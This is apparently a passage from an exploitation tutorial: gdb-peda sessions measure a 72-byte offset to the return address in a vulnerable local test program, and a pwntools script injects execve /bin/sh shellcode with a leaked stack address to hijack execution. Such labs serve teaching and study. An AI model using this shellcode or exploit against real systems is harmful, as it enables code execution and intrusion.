...
| Code Block | ||
|---|---|---|
| ||
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/shellcode/poc
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/shellcode/test
Breakpoint 1, 0x0000000000400566 in vuln ()
gdb-peda$ i r rsp
rsp 0x7fffffffe448 0x7fffffffe448
gdb-peda$ x/gx 0x7fffffffe448
0x7fffffffe448: 0x00000000004005ab
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x000000000040059d <+0>: push rbp
0x000000000040059e <+1>: mov rbp,rsp
0x00000000004005a1 <+4>: mov eax,0x0
0x00000000004005a6 <+9>: call 0x400566 <vuln>
0x00000000004005ab <+14>: nop
0x00000000004005ac <+15>: pop rbp
0x00000000004005ad <+16>: ret
End of assembler dump.
gdb-peda$ |
...
| Code Block | ||
|---|---|---|
| ||
gdb-peda$ c
Continuing.
buf[50] address : 0x7fffffffe400
Breakpoint 2, 0x0000000000400595 in vuln ()
gdb-peda$ i r rsi
rsi 0x7fffffffe400 0x7fffffffe400
gdb-peda$ p/d 0x7fffffffe448 - 0x7fffffffe400
$1 = 72
gdb-peda$ ni
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJKKKKKKKK
gdb-peda$ x/10gx 0x7fffffffe400
0x7fffffffe400: 0x4141414141414141 0x4242424242424242
0x7fffffffe410: 0x4343434343434343 0x4444444444444444
0x7fffffffe420: 0x4545454545454545 0x4646464646464646
0x7fffffffe430: 0x4747474747474747 0x4848484848484848
0x7fffffffe440: 0x4949494949494949 0x4a4a4a4a4a4a4a4a
gdb-peda$ |
...
| Code Block | ||||
|---|---|---|---|---|
| ||||
from pwn import *
p = process('./testpoc')
p.recvuntil('buf[50] address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
exploit = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
exploit += "\x90" * (72 - len(exploit))
exploit += p64(stackAddr)
p.send(exploit)
p.interactive() |
...
Comments
| Panel |
|---|